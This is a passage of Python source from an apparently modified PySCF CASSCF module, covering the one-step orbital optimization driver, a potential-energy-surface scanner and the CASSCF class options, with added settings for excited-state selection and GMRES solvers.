'max(|x|)=%5.3g |dr|=%5.3g eig=%5.3g seig=%5.3g',
imic, ihop, norm_gorb, norm_dxi,
dxmax, norm_dr, w, seig)
ikf += 1
if ikf > 1 and norm_gorb > norm_gkf*casscf.ah_grad_trust_region:
g_orb = g_orb - hdxi
dr -= dxi
#norm_gorb = numpy.linalg.norm(g_orb)
log.debug('|g| >> keyframe, Restore previouse step')
break
elif (norm_gorb < conv_tol_grad*.3):
break
elif (ikf >= max(casscf.kf_interval, -numpy.log(norm_dr+1e-7)) or
# Insert keyframe if the keyframe and the esitimated grad are too different
norm_gorb < norm_gkf/casscf.kf_trust_region):
ikf = 0
u = casscf.update_rotate_matrix(dr, u)
t3m = log.timer('aug_hess in %d inner iters' % imic, *t3m)
yield u, g_kf, ihop+jkcount, dxi
t3m = (time.clock(), time.time())
# TODO: test whether to update h_op, h_diag to change the orbital hessian.
# It leads to the different hessian operations in the same davidson
# diagonalization procedure. This is generally a bad approximation because it
# results in ill-defined hessian eigenvalue in the davidson algorithm. But in
# certain cases, it is a small perturbation that help the mcscf optimization
# algorithm move out of local minimum
# h_op, h_diag = \
# casscf.gen_g_hop(mo, u, fcasdm1(), fcasdm2(), eris)[2:4]
g_kf1 = gorb_update(u, fcivec())
jkcount += 1
norm_gkf1 = numpy.linalg.norm(g_kf1)
norm_dg = numpy.linalg.norm(g_kf1-g_orb)
log.debug(' |g|=%5.3g (keyframe), |g-correction|=%5.3g',
norm_gkf1, norm_dg)
#
# Special treatment if out of trust region
#
if (norm_dg > norm_gorb*casscf.ah_grad_trust_region and
norm_gkf1 > norm_gkf and
norm_gkf1 > norm_gkf*casscf.ah_grad_trust_region):
log.debug(' Keyframe |g|=%5.3g |g_last| =%5.3g out of trust region',
norm_gkf1, norm_gorb)
# Slightly moving forward, not completely restoring last step.
# In some cases, the optimization moves out of trust region in the first micro
# iteration. The small forward step can ensure the orbital changes in the
# current iteration.
dr = -dxi * .5
g_kf = g_kf1
break
t3m = log.timer('gen h_op', *t3m)
g_orb = g_kf = g_kf1
norm_gorb = norm_gkf = norm_gkf1
dr[:] = 0
u = casscf.update_rotate_matrix(dr, u)
yield u, g_kf, ihop+jkcount, dxi
def kernel(casscf, mo_coeff, tol=1e-7, conv_tol_grad=1e-03,
ci0=None, callback=None, verbose=logger.NOTE, dump_chk=True):
'''quasi-newton CASSCF optimization driver
'''
log = logger.new_logger(casscf, verbose)
cput0 = (time.clock(), time.time())
log.debug('Start 1-step CASSCF')
if callback is None:
callback = casscf.callback
mo = mo_coeff
nmo = mo_coeff.shape[1]
#TODO: lazy evaluate eris, to leave enough memory for FCI solver
eris = casscf.ao2mo(mo)
if os.environ.get("cycle") is not None:
#if (int(os.environ["cycle"])+1) == 1:
# conv_tol_grad = 5e-03
# tol = 5e-04
# logger.info(casscf, 'Lan sets conv_tol to %g', tol)
# logger.info(casscf, 'Lan sets conv_tol_grad to %g', conv_tol_grad)
if (int(os.environ["cycle"])+1) > 1:
if(casscf.is_select_state):
rdm1_pregeom_AO = addons.make_rdm12(casscf, mo, ci0) #, rdm2Target_AO
#print "rdm1_pregeom_AO"
#print rdm1_pregeom_AO
e_tot, e_cas, fcivec = casscf.casci(mo, ci0, eris, log, locals())
if casscf.ncas == nmo and not casscf.internal_rotation:
if casscf.canonicalization:
log.debug('CASSCF canonicalization')
mo, fcivec, mo_energy = casscf.canonicalize(mo, fcivec, eris,
casscf.sorting_mo_energy,
casscf.natorb, verbose=log)
else:
mo_energy = None
return True, e_tot, e_cas, fcivec, mo, mo_energy
if conv_tol_grad is None:
conv_tol_grad = numpy.sqrt(tol)
logger.info(casscf, 'Set conv_tol_grad to %g', conv_tol_grad)
conv_tol_ddm = conv_tol_grad * 5
conv = False
totmicro = totinner = 0
norm_gorb = norm_gci = -1
de, elast = e_tot, e_tot
r0 = None
#Lan generates targeted rdms
if(casscf.is_select_state):
rdm1Target_AO = addons.make_rdm12(casscf, mo, fcivec) #, rdm2Target_AO
#casdm1Target, casdm2Target = casscf.fcisolver.make_rdm12(fcivec, casscf.ncas, casscf.nelecas)
t1m = log.timer('Initializing 1-step CASSCF', *cput0)
casdm1, casdm2 = casscf.fcisolver.make_rdm12(fcivec, casscf.ncas, casscf.nelecas)
norm_ddm = 1e2
casdm1_prev = casdm1_last = casdm1
t3m = t2m = log.timer('CAS DM', *t1m)
imacro = 0
dr0 = None
while not conv and imacro < casscf.max_cycle_macro:
imacro += 1
njk = 0
omega = e_tot
casdm1_old = casdm1
#casdm1, casdm2 = casscf.fcisolver.make_rdm12(fcivec, casscf.ncas, casscf.nelecas)
max_cycle_micro = casscf.micro_cycle_scheduler(locals())
max_stepsize = casscf.max_stepsize_scheduler(locals())
imicro = 0
if(casscf.is_use_gmres):
print("Using GMRES")
for imicro in range(max_cycle_micro):
imicro += 1
print('imicro', imicro)
u, g_orb = casscf.rotate_orb_gmres(mo, lambda:fcivec, lambda:casdm1, lambda:casdm2,
eris, imacro, r0, conv_tol_grad*.3, max_stepsize, log)
norm_gorb = numpy.linalg.norm(g_orb)
log.debug(' |g|=%5.3g', norm_gorb)
if imicro == 1:
norm_gorb0 = norm_gorb
norm_t = numpy.linalg.norm(u-numpy.eye(nmo))
t3m = log.timer('orbital rotation', *t3m)
if imicro >= max_cycle_micro:
log.debug('micro %d |u-1|=%5.3g |g[o]|=%5.3g',
imicro, norm_t, norm_gorb)
break
casdm1, casdm2, gci, fcivec = \
casscf.update_casdm(mo, u, fcivec, e_cas, eris, locals())
norm_ddm = numpy.linalg.norm(casdm1 - casdm1_last)
norm_ddm_micro = numpy.linalg.norm(casdm1 - casdm1_prev)
casdm1_prev = casdm1
t3m = log.timer('update CAS DM', *t3m)
if isinstance(gci, numpy.ndarray):
norm_gci = numpy.linalg.norm(gci)
log.debug('micro %d |u-1|=%5.3g |g[o]|=%5.3g |g[c]|=%5.3g |ddm|=%5.3g',
imicro, norm_t, norm_gorb, norm_gci, norm_ddm)
else:
norm_gci = None
log.debug('micro %d |u-1|=%5.3g |g[o]|=%5.3g |g[c]|=%s |ddm|=%5.3g',
imicro, norm_t, norm_gorb, norm_gci, norm_ddm)
if callable(callback):
callback(locals())
t3m = log.timer('micro iter %d'%imicro, *t3m)
#if (norm_t < conv_tol_grad or
# (norm_gorb < conv_tol_grad*.5 and
# (norm_ddm < conv_tol_ddm*.4 or norm_ddm_micro < conv_tol_ddm*.4))):
# break
#eris = None
#u = u.copy()
#g_orb = g_orb.copy()
#mo = casscf.rotate_mo(mo, u, log=None)
#eris = casscf.ao2mo(mo)
#t3m = log.timer('update eri', *t3m)
##norm_t = numpy.linalg.norm(u-numpy.eye(nmo))
##de = numpy.dot(casscf.pack_uniq_var(u), g_orb)
##save current imicro
#norm_gorb_old = norm_gorb
#u_old = u
#g_orb_old = g_orb
#if norm_gorb < 1e-04: #norm_t < 1e-4 or abs(de) < tol*.4 or
# break
#print "new molecular orbitals"
#from pyscf import tools
#tools.dump_mat.dump_mo(casscf.mol, mo, label=casscf.mol.ao_labels(), digits=6)
#if imacro%5 == 0:
# fname='mo_iter_'+str(imacro)+'.txt'
# with open(fname, 'w') as f:
# for i in range(mo.shape[0]):
# for j in range(mo.shape[1]):
# f.write(" %20.10f" % mo[i,j])
# f.write("\n")
else:
rota = casscf.rotate_orb_cc(mo, lambda:fcivec, lambda:casdm1, lambda:casdm2,
eris, r0, conv_tol_grad*.3, max_stepsize, log)
for u, g_orb, njk, r0 in rota:
imicro += 1
norm_gorb = numpy.linalg.norm(g_orb)
if imicro == 1:
norm_gorb0 = norm_gorb
norm_t = numpy.linalg.norm(u-numpy.eye(nmo))
t3m = log.timer('orbital rotation', *t3m)
if imicro >= max_cycle_micro:
log.debug('micro %d |u-1|=%5.3g |g[o]|=%5.3g',
imicro, norm_t, norm_gorb)
break
casdm1, casdm2, gci, fcivec = \
casscf.update_casdm(mo, u, fcivec, e_cas, eris, locals())
norm_ddm = numpy.linalg.norm(casdm1 - casdm1_last)
norm_ddm_micro = numpy.linalg.norm(casdm1 - casdm1_prev)
casdm1_prev = casdm1
t3m = log.timer('update CAS DM', *t3m)
if isinstance(gci, numpy.ndarray):
norm_gci = numpy.linalg.norm(gci)
log.debug('micro %d |u-1|=%5.3g |g[o]|=%5.3g |g[c]|=%5.3g |ddm|=%5.3g',
imicro, norm_t, norm_gorb, norm_gci, norm_ddm)
else:
norm_gci = None
log.debug('micro %d |u-1|=%5.3g |g[o]|=%5.3g |g[c]|=%s |ddm|=%5.3g',
imicro, norm_t, norm_gorb, norm_gci, norm_ddm)
if callable(callback):
callback(locals())
t3m = log.timer('micro iter %d'%imicro, *t3m)
if (norm_t < conv_tol_grad or
(norm_gorb < conv_tol_grad*.5 and
(norm_ddm < conv_tol_ddm*.4 or norm_ddm_micro < conv_tol_ddm*.4))):
break
rota.close()
rota = None
eris = None
# keep u, g_orb in locals() so that they can be accessed by callback
u = u.copy()
g_orb = g_orb.copy()
mo = casscf.rotate_mo(mo, u, log)
eris = casscf.ao2mo(mo)
t2m = log.timer('update eri', *t3m)
totmicro += imicro
totinner += njk
if casscf.is_use_sCI and casscf.is_save_sCIout:
if os.path.exists("output.dat"):
import shutil
if os.environ.get("cycle") is not None:
icycle = int(os.environ["cycle"])+1
shutil.copyfile("output.dat","output_"+str(icycle)+"_"+str(imacro)+".dat")
else:
shutil.copyfile("output.dat","output_"+str(imacro)+".dat")
e_tot, e_cas, fcivec = casscf.casci(mo, fcivec, eris, log, locals())
casdm1, casdm2 = casscf.fcisolver.make_rdm12(fcivec, casscf.ncas, casscf.nelecas)
norm_ddm = numpy.linalg.norm(casdm1 - casdm1_last)
casdm1_prev = casdm1_last = casdm1
log.timer('CASCI solver', *t2m)
t3m = t2m = t1m = log.timer('macro iter %d'%imacro, *t1m)
de, elast = e_tot - elast, e_tot
#print "AAAAAAAAAAAA ", tol, conv_tol_grad, conv_tol_ddm
#print "BBBBBBBBBBBB ", abs(de), norm_gorb0, norm_ddm
if (abs(de) < tol
and (norm_gorb0 < conv_tol_grad and norm_ddm < conv_tol_ddm)):
conv = True
if dump_chk:
casscf.dump_chk(locals())
if callable(callback):
callback(locals())
if conv:
log.info('1-step CASSCF converged in %d macro (%d JK %d micro) steps',
imacro, totinner, totmicro)
else:
log.info('1-step CASSCF not converged, %d macro (%d JK %d micro) steps',
imacro, totinner, totmicro)
if casscf.canonicalization:
log.info('CASSCF canonicalization')
mo, fcivec, mo_energy = \
casscf.canonicalize(mo, fcivec, eris, casscf.sorting_mo_energy,
casscf.natorb, casdm1, log)
if casscf.natorb and dump_chk: # dump_chk may save casdm1
nocc = casscf.ncore + casscf.ncas
occ, ucas = casscf._eig(-casdm1, casscf.ncore, nocc)
casdm1 = numpy.diag(-occ)
else:
mo_energy = None
if dump_chk:
casscf.dump_chk(locals())
log.timer('1-step CASSCF', *cput0)
return conv, e_tot, e_cas, fcivec, mo, mo_energy
def as_scanner(mc, envs=None): #, mo_fname=None):
'''Generating a scanner for CASSCF PES.
The returned solver is a function. This function requires one argument
"mol" as input and returns total CASSCF energy.
The solver will automatically use the results of last calculation as the
initial guess of the new calculation. All parameters of MCSCF object
(conv_tol, max_memory etc) are automatically applied in the solver.
Note scanner has side effects. It may change many underlying objects
(_scf, with_df, with_x2c, ...) during calculation.
Examples:
>>> from pyscf import gto, scf, mcscf
>>> mol = gto.M(atom='N 0 0 0; N 0 0 1.2', verbose=0)
>>> mc_scanner = mcscf.CASSCF(scf.RHF(mol), 4, 4).as_scanner()
>>> e = mc_scanner(gto.M(atom='N 0 0 0; N 0 0 1.1'))
>>> e = mc_scanner(gto.M(atom='N 0 0 0; N 0 0 1.5'))
'''
from pyscf.mcscf.addons import project_init_guess
if isinstance(mc, lib.SinglePointScanner):
return mc
logger.info(mc, 'Create scanner for %s', mc.__class__)
def write_mat(y, fname, ut=False):
x = y
if type(y) == type(1) or type(y) == type(1.0) or type(y) == type(numpy.array([1.0])[0]) or type(y) == type(numpy.array([1])[0]):
x = numpy.array([[ 1.0 * y ]])
elif len(y.shape) == 1:
x = numpy.reshape(y, [y.size,1])
with open(fname, 'w') as f:
for i in range(x.shape[0]):
for j in range(x.shape[1]):
if j >= i or not ut:
f.write(" %20.10f" % x[i,j])
else:
f.write(" %20s" % " ")
f.write("\n")
class CASSCF_Scanner(mc.__class__, lib.SinglePointScanner):
def __init__(self, mc):
self.__dict__.update(mc.__dict__)
self._scf = mc._scf.as_scanner()
def __call__(self, mol_or_geom, **kwargs):
if isinstance(mol_or_geom, gto.Mole):
mol = mol_or_geom
else:
mol = self.mol.set_geom_(mol_or_geom, inplace=False)
mf_scanner = self._scf
mf_scanner(mol)
self.mol = mol
if (self.mo_coeff is None):
print("we are using HF orbitals")
mo = mf_scanner.mo_coeff
else:
print("we are using predefined orbitals")
mo = self.mo_coeff
#geom_cycle = int(os.environ["cycle"])+1
#if geom_cycle == 1:
# mo_coeff_fix = mo
#else:
# print "we are using the fixed MOs"
# mo = mo_coeff_fix
mo = project_init_guess(self, mo)
#print "envs[cycle]", envs['cycle']
#Lan: optimizing excited state
if(self.is_select_state):
print("You are optimizing your selected state")
#if os.environ.get("cycle") is not None:
# geom_cycle = int(os.environ["cycle"])+1
# if geom_cycle > 1:
# print "Using SA as initial guess of SS"
# nroots = 4 #self.fcisolver.nroots
# w = 1./nroots
# #w = 1./7
#
# mc_sa = CASSCF(mol, self.ncas, self.nelecas, frozen=None)
# mc_sa.fcisolver = fci.solver(mol, singlet=True)
# #mc_sa.fcisolver.wfnsym = 1 #self.fcisolver.wfnsym
# #mc_sa = addons.state_average_(mc_sa, (w,w,0,0,0,w,w,w,w,w)) #nroots*(w,)) #
# mc_sa = addons.state_average_(mc_sa, nroots*(w,)) #
# mc_sa.is_use_gmres = True
# mc_sa.gmres_hess_shift=0.2
# mc_sa.is_select_state = False
# mc_sa.mo_coeff = mf_scanner.mo_coeff
# mc_sa.mc1step()
# mo = mc_sa.mo_coeff
# #e_tot = self.mc2step(mo, self.ci)[0]
e_tot = self.mc1step(mo, self.ci)[0]
#from pyscf import molden
#with open('geomopt_'+str(geom_cycle)+'.molden', 'w') as f:
# molden.header(mol,f)
# molden.orbital_coeff(self.mol, f, self.mo_coeff)
elif(self.sa_geom_opt):
print()
print("WARN: you are optimizing geometry using SA-CASSCF orbitals w/o solving Z-vector equation!!!")
nroots = self.fcisolver.nroots
w = 1./nroots
mc_sa = CASSCF(mol, self.ncas, self.nelecas, frozen=None)
#cas_list = [25,27,28,29,30,31,32,33,34,37,43]
#geom_cycle = int(os.environ["cycle"])+1
#mc_sa.mo_coeff = addons.sort_mo(mc_sa, mo, cas_list)
mc_sa.fcisolver = fci.solver(mol, singlet=True)
mc_sa = addons.state_average_(mc_sa, nroots*(w,))
mc_sa.is_select_state = False
#mc_sa.is_use_gmres = True
#mc_sa.gmres_hess_shift=0.2
mc_sa.kernel(mo)
mo = mc_sa.mo_coeff
e_tot = self.mc2step(mo, self.ci)[0]
else:
e_tot = self.kernel(mo, self.ci)[0]
return e_tot
return CASSCF_Scanner(mc)
# To extend CASSCF for certain CAS space solver, it can be done by assign an
# object or a module to CASSCF.fcisolver. The fcisolver object or module
# should at least have three member functions "kernel" (wfn for given
# hamiltonain), "make_rdm12" (1- and 2-pdm), "absorb_h1e" (effective
# 2e-hamiltonain) in 1-step CASSCF solver, and two member functions "kernel"
# and "make_rdm12" in 2-step CASSCF solver
class CASSCF(casci.CASCI):
__doc__ = casci.CASCI.__doc__ + '''CASSCF
Extra attributes for CASSCF:
conv_tol : float
Converge threshold. Default is 1e-7
conv_tol_grad : float
Converge threshold for CI gradients and orbital rotation gradients.
Default is 1e-4
max_stepsize : float
The step size for orbital rotation. Small step (0.005 - 0.05) is prefered.
Default is 0.03.
max_cycle_macro : int
Max number of macro iterations. Default is 50.
max_cycle_micro : int
Max number of micro iterations in each macro iteration. Depending on
systems, increasing this value might reduce the total macro
iterations. Generally, 2 - 5 steps should be enough. Default is 3.
ah_level_shift : float, for AH solver.
Level shift for the Davidson diagonalization in AH solver. Default is 1e-8.
ah_conv_tol : float, for AH solver.
converge threshold for AH solver. Default is 1e-12.
ah_max_cycle : float, for AH solver.
Max number of iterations allowd in AH solver. Default is 30.
ah_lindep : float, for AH solver.
Linear dependence threshold for AH solver. Default is 1e-14.
ah_start_tol : flat, for AH solver.
In AH solver, the orbital rotation is started without completely solving the AH problem.
This value is to control the start point. Default is 0.2.
ah_start_cycle : int, for AH solver.
In AH solver, the orbital rotation is started without completely solving the AH problem.
This value is to control the start point. Default is 2.
``ah_conv_tol``, ``ah_max_cycle``, ``ah_lindep``, ``ah_start_tol`` and ``ah_start_cycle``
can affect the accuracy and performance of CASSCF solver. Lower
``ah_conv_tol`` and ``ah_lindep`` might improve the accuracy of CASSCF
optimization, but decrease the performance.
>>> from pyscf import gto, scf, mcscf
>>> mol = gto.M(atom='N 0 0 0; N 0 0 1', basis='ccpvdz', verbose=0)
>>> mf = scf.UHF(mol)
>>> mf.scf()
>>> mc = mcscf.CASSCF(mf, 6, 6)
>>> mc.conv_tol = 1e-10
>>> mc.ah_conv_tol = 1e-5
>>> mc.kernel()[0]
-109.044401898486001
>>> mc.ah_conv_tol = 1e-10
>>> mc.kernel()[0]
-109.044401887945668
chkfile : str
Checkpoint file to save the intermediate orbitals during the CASSCF optimization.
Default is the checkpoint file of mean field object.
ci_response_space : int
subspace size to solve the CI vector response. Default is 3.
callback : function(envs_dict) => None
callback function takes one dict as the argument which is
generated by the builtin function :func:`locals`, so that the
callback function can access all local variables in the current
envrionment.
Saved results
e_tot : float
Total MCSCF energy (electronic energy plus nuclear repulsion)
e_cas : float
CAS space FCI energy
ci : ndarray
CAS space FCI coefficients
mo_coeff : ndarray
Optimized CASSCF orbitals coefficients. When canonicalization is
specified, the returned orbitals make the general Fock matrix
(Fock operator on top of MCSCF 1-particle density matrix)
diagonalized within each subspace (core, active, external).
If natorb (natural orbitals in active space) is specified,
the active segment of the mo_coeff is natural orbitls.
mo_energy : ndarray
Diagonal elements of general Fock matrix (in mo_coeff
representation).
Examples:
>>> from pyscf import gto, scf, mcscf
>>> mol = gto.M(atom='N 0 0 0; N 0 0 1', basis='ccpvdz', verbose=0)
>>> mf = scf.RHF(mol)
>>> mf.scf()
>>> mc = mcscf.CASSCF(mf, 6, 6)
>>> mc.kernel()[0]
-109.044401882238134
'''
# the max orbital rotation and CI increment, prefer small step size
max_stepsize = getattr(__config__, 'mcscf_mc1step_CASSCF_max_stepsize', .02)
max_cycle_macro = getattr(__config__, 'mcscf_mc1step_CASSCF_max_cycle_macro', 50)
max_cycle_micro = getattr(__config__, 'mcscf_mc1step_CASSCF_max_cycle_micro', 1)
conv_tol = getattr(__config__, 'mcscf_mc1step_CASSCF_conv_tol', 5e-6)
conv_tol_grad = getattr(__config__, 'mcscf_mc1step_CASSCF_conv_tol_grad', 5e-04)
# for augmented hessian
ah_level_shift = getattr(__config__, 'mcscf_mc1step_CASSCF_ah_level_shift', 1e-8)
ah_conv_tol = getattr(__config__, 'mcscf_mc1step_CASSCF_ah_conv_tol', 1e-12)
ah_max_cycle = getattr(__config__, 'mcscf_mc1step_CASSCF_ah_max_cycle', 30)
ah_lindep = getattr(__config__, 'mcscf_mc1step_CASSCF_ah_lindep', 1e-14)
# * ah_start_tol and ah_start_cycle control the start point to use AH step.
# In function rotate_orb_cc, the orbital rotation is carried out with the
# approximate aug_hessian step after a few davidson updates of the AH eigen
# problem. Reducing ah_start_tol or increasing ah_start_cycle will delay
# the start point of orbital rotation.
# * We can do early ah_start since it only affect the first few iterations.
# The start tol will be reduced when approach the convergence point.
# * Be careful with the SYMMETRY BROKEN caused by ah_start_tol/ah_start_cycle.
# ah_start_tol/ah_start_cycle actually approximates the hessian to reduce
# the J/K evaluation required by AH. When the system symmetry is higher
# than the one given by mol.symmetry/mol.groupname, symmetry broken might
# occur due to this approximation, e.g. with the default ah_start_tol,
# C2 (16o, 8e) under D2h symmetry might break the degeneracy between
# pi_x, pi_y orbitals since pi_x, pi_y belong to different irreps. It can
# be fixed by increasing the accuracy of AH solver, e.g.
# ah_start_tol = 1e-8; ah_conv_tol = 1e-10
# * Classic AH can be simulated by setting eg
# ah_start_tol = 1e-7
# max_stepsize = 1.5
# ah_grad_trust_region = 1e6
# ah_grad_trust_region allow gradients being increased in AH optimization
ah_start_tol = getattr(__config__, 'mcscf_mc1step_CASSCF_ah_start_tol', 2.5)
ah_start_cycle = getattr(__config__, 'mcscf_mc1step_CASSCF_ah_start_cycle', 3)
ah_grad_trust_region = getattr(__config__, 'mcscf_mc1step_CASSCF_ah_grad_trust_region', 3.0)
internal_rotation = getattr(__config__, 'mcscf_mc1step_CASSCF_internal_rotation', False)
ci_response_space = getattr(__config__, 'mcscf_mc1step_CASSCF_ci_response_space', 4)
ci_grad_trust_region = getattr(__config__, 'mcscf_mc1step_CASSCF_ci_grad_trust_region', 3)
with_dep4 = getattr(__config__, 'mcscf_mc1step_CASSCF_with_dep4', False)
chk_ci = getattr(__config__, 'mcscf_mc1step_CASSCF_chk_ci', False)
kf_interval = getattr(__config__, 'mcscf_mc1step_CASSCF_kf_interval', 4)
kf_trust_region = getattr(__config__, 'mcscf_mc1step_CASSCF_kf_trust_region', 3.0)
ao2mo_level = getattr(__config__, 'mcscf_mc1step_CASSCF_ao2mo_level', 2)
natorb = getattr(__config__, 'mcscf_mc1step_CASSCF_natorb', False)
canonicalization = getattr(__config__, 'mcscf_mc1step_CASSCF_canonicalization', True)
sorting_mo_energy = getattr(__config__, 'mcscf_mc1step_CASSCF_sorting_mo_energy', False)
# Lan's options are below:
#for selecting excited state
target_state = getattr(__config__, 'mcscf_mc1step_CASSCF_target_state', 0)
target_state_spin = getattr(__config__, 'mcscf_mc1step_CASSCF_target_state_spin', 0)
is_select_state = getattr(__config__, 'mcscf_mc1step_CASSCF_is_select_state', True)
is_target_dipole = getattr(__config__, 'mcscf_mc1step_CASSCF_is_target_dipole', False)
sa_geom_opt = getattr(__config__, 'state-averaging geometry optimization w/o Z-vector', False)
#for GMRES and line search
is_use_gmres = getattr(__config__, 'mcscf_mc1step_CASSCF_is_use_gmres', False)
gmres_conv_tol = getattr(__config__, 'mcscf_mc1step_CASSCF_gmres_conv_tol', 1e-06)
gmres_max_cycle = getattr(__config__, 'mcscf_mc1step_CASSCF_gmres_max_cycle', 100)
gmres_hess_shift = getattr(__config__, 'mcscf_mc1step_CASSCF_gmres_hess_shift', 0.)
is_gmres_trust_region = getattr(__config__, 'mcscf_mc1step_CASSCF_is_gmres_precond', True)
is_gmres_precond = getattr(__config__, 'mcscf_mc1step_CASSCF_is_gmres_precond', True)
is_gmres_conv_dynm = getattr(__config__, 'mcscf_mc1step_CASSCF_is_gmres_conv_dynm', False)
is_line_search = getattr(__config__, 'mcscf_mc1step_CASSCF_is_line_search', False)
is_only_ddm = getattr(__config__, 'mcscf_mc1step_CASSCF_is_only_ddm', False)
is_only_W = getattr(__config__, 'mcscf_mc1step_CASSCF_is_only_W', False)
is_only_H2 = getattr(__config__, 'mcscf_mc1step_CASSCF_is_only_H2', False)
is_only_E = getattr(__config__, 'mcscf_mc1step_CASSCF_is_only_E', False)
is_only_dipole = getattr(__config__, 'mcscf_mc1step_CASSCF_is_only_dipole', False)
is_ddm_and_dipole = getattr(__config__, 'mcscf_mc1step_CASSCF_is_ddm_and_dipole', False)
#for sCI
is_use_sCI = getattr(__config__, 'mcscf_mc1step_CASSCF_is_use_sCI', False)
is_save_sCIout = getattr(__config__, 'mcscf_mc1step_CASSCF_is_save_sCIout', False)
def __init__(self, mf_or_mol, ncas, nelecas, ncore=None, frozen=None):
casci.CASCI.__init__(self, mf_or_mol, ncas, nelecas, ncore)
self.frozen = frozen
self.callback = None
self.chkfile = self._scf.chkfile
self.fcisolver.max_cycle = getattr(__config__,
'mcscf_mc1step_CASSCF_fcisolver_max_cycle', 50)
self.fcisolver.conv_tol = getattr(__config__,
'mcscf_mc1step_CASSCF_fcisolver_conv_tol', 1e-8)
##################################################
# don't modify the following attributes, they are not input options
self.e_tot = None
self.e_cas = None
self.ci = None
self.mo_coeff = self._scf.mo_coeff
self.mo_energy = self._scf.mo_energy
self.converged = False
self._max_stepsize = None
keys = set(('max_stepsize', 'max_cycle_macro', 'max_cycle_micro',
'conv_tol', 'conv_tol_grad', 'ah_level_shift',
'ah_conv_tol', 'ah_max_cycle', 'ah_lindep',
'ah_start_tol', 'ah_start_cycle', 'ah_grad_trust_region',
'internal_rotation', 'ci_response_space',
'ci_grad_trust_region', 'with_dep4', 'chk_ci',
'kf_interval', 'kf_trust_region', 'fcisolver_max_cycle',
'fcisolver_conv_tol', 'natorb', 'canonicalization',
'sorting_mo_energy', 'is_use_gmres', 'gmres_conv_tol',
'gmres_max_cycle', 'gmres_hess_shift', 'is_gmres_trust_region',
'is_gmres_precond', 'is_gmres_conv_dynm',
'is_line_search', 'is_only_ddm', 'is_only_W','is_only_H2', 'is_only_E', 'is_only_dipole', 'is_ddm_and_dipole',
'target_state', 'is_select_state', 'is_target_dipole', 'sa_geom_opt',
'target_state_spin', 'is_use_sCI', 'is_save_sCIout'))
self._keys = set(self.__dict__.keys()).union(keys)
def dump_flags(self, verbose=None):
log = logger.new_logger(self, verbose)
log.info('')
log.info('******** %s ********', self.__class__)
nvir = self.mo_coeff.shape[1] - self.ncore - self.ncas
log.info('CAS (%de+%de, %do), ncore = %d, nvir = %d', \
self.nelecas[0], self.nelecas[1], self.ncas, self.ncore, nvir)
assert(self.ncas > 0)
if self.frozen is not None:
log.info('frozen orbitals %s', str(self.frozen))
log.info('max_cycle_macro = %d', self.max_cycle_macro)
log.info('max_cycle_micro = %d', self.max_cycle_micro)
log.info('conv_tol = %g', self.conv_tol)
log.info('conv_tol_grad = %s', self.conv_tol_grad)
log.info('ci_response_space = %d', self.ci_response_space)
log.info('ci_grad_trust_region = %d', self.ci_grad_trust_region)
log.info('kf_trust_region = %g', self.kf_trust_region)
log.info('kf_interval = %d', self.kf_interval)
if not self.is_use_gmres:
log.info('orbital rotation max_stepsize = %g', self.max_stepsize)
log.info('augmented hessian ah_max_cycle = %d', self.ah_max_cycle)
log.info('augmented hessian ah_conv_tol = %g', self.ah_conv_tol)
log.info('augmented hessian ah_linear dependence = %g', self.ah_lindep)
log.info('augmented hessian ah_level shift = %d', self.ah_level_shift)
log.info('augmented hessian ah_start_tol = %g', self.ah_start_tol)
log.info('augmented hessian ah_start_cycle = %d', self.ah_start_cycle)
log.info('augmented hessian ah_grad_trust_region = %g', self.ah_grad_trust_region)
else:
log.info('is_select_state = %s', self.is_select_state)
if self.is_select_state:
log.info('is_target_dipole = %s', self.is_select_state)
log.info('is_only_ddm = %s', self.is_only_ddm)
log.info('is_only_W = %s', self.is_only_W)
log.info('is_only_H2 = %s', self.is_only_H2)
log.info('is_only_E = %s', self.is_only_E)
log.info('is_only_dipole = %s', self.is_only_dipole)
log.info('is_ddm_and_dipole = %s', self.is_ddm_and_dipole)
log.info('gmres_max_cycle = %d', self.gmres_max_cycle)
if not self.is_gmres_conv_dynm:
log.info('gmres_conv_tol = %g', self.gmres_conv_tol)
log.info('gmres_hess_shift = %g', self.gmres_hess_shift)
log.info('is_gmres_precond = %s', self.is_gmres_precond)
log.info('is_gmres_trust_region = %s', self.is_gmres_trust_region)
log.info('is_gmres_conv_dynm = %s', self.is_gmres_conv_dynm)
log.info('is_line_search = %s', self.is_line_search)
log.info('with_dep4 %d', self.with_dep4)
log.info('natorb = %s', self.natorb)
log.info('canonicalization = %s', self.canonicalization)
log.info('sorting_mo_energy = %s', self.sorting_mo_energy)
log.info('ao2mo_level = %d', self.ao2mo_level)
log.info('chkfile = %s', self.chkfile)
log.info('max_memory %d MB (current use %d MB)',
self.max_memory, lib.current_memory()[0])
log.info('internal_rotation = %s', self.internal_rotation)
if getattr(self.fcisolver, 'dump_flags', None):
self.fcisolver.dump_flags(self.verbose)
if self.mo_coeff is None:
log.error('Orbitals for CASCI are not specified. The relevant SCF '
'object may not be initialized.')
if (getattr(self._scf, 'with_solvent', None) and
not getattr(self, 'with_solvent', None)):
log.warn('''Solvent model %s was found in SCF object.
It is not applied to the CASSCF object. The CASSCF result is not affected by the SCF solvent model.
To enable the solvent model for CASSCF, a decoration to CASSCF object as below needs be called
from pyscf import solvent
mc = mcscf.CASSCF(...)
mc = solvent.ddCOSMO(mc)
''',
self._scf.with_solvent.__class__)
return self
def kernel(self, mo_coeff=None, ci0=None, callback=None, _kern=kernel):
'''
Returns:
Five elements, they are
total energy,
active space CI energy,
the active space FCI wavefunction coefficients or DMRG wavefunction ID,
the MCSCF canonical orbital coefficients,
the MCSCF canonical orbital coefficients.
They are attributes of mcscf object, which can be accessed by
.e_tot, .e_cas, .ci, .mo_coeff, .mo_energy
'''
if mo_coeff is None:
mo_coeff = self.mo_coeff
else: # overwrite self.mo_coeff because it is needed in many methods of this class
self.mo_coeff = mo_coeff
if callback is None: callback = self.callback
if self.verbose >= logger.WARN:
self.check_sanity()
self.dump_flags()
self.converged, self.e_tot, self.e_cas, self.ci, \
self.mo_coeff, self.mo_energy = \
_kern(self, mo_coeff,
tol=self.conv_tol, conv_tol_grad=self.conv_tol_grad,
ci0=ci0, callback=callback, verbose=self.verbose)
logger.note(self, 'CASSCF energy = %.15g', self.e_tot)
self._finalize()
return self.e_tot, self.e_cas, self.ci, self.mo_coeff, self.mo_energy
def mc1step(self, mo_coeff=None, ci0=None, callback=None):
return self.kernel(mo_coeff, ci0, callback)
def mc2step(self, mo_coeff=None, ci0=None, callback=None):
from pyscf.mcscf import mc2step
return self.kernel(mo_coeff, ci0, callback, mc2step.kernel)
def casci(self, mo_coeff, ci0=None, eris=None, verbose=None, envs=None):
